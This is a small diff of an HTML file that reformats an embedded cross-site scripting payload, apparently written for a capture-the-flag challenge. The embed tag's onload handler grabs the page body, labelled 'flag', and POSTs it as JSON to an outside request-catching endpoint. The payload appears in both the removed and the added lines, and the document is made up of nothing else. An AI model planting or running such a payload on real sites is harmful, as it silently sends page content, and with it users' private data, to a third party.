--- a/index.html
+++ b/index.html
@@ -1,5 +1,9 @@
 <html>
  <body>
-   `<embed onload = "let flag = this.document.body;\nvar xhr = new window.XMLHttpRequest();\nxhr.open('POST', 'https://alexyqiu.free.beeceptor.com', true);\nxhr.setRequestHeader('Content-Type', 'application/json; charset=UTF-8');\nxhr.send(JSON.stringify(flag));">`
+   `<embed onload = "let flag = this.document.body;
+var xhr = new window.XMLHttpRequest();
+xhr.open('POST', 'https://alexyqiu.free.beeceptor.com', true);
+xhr.setRequestHeader('Content-Type', 'application/json; charset=UTF-8');
+xhr.send(JSON.stringify(flag));">`
 </body>
 </html>
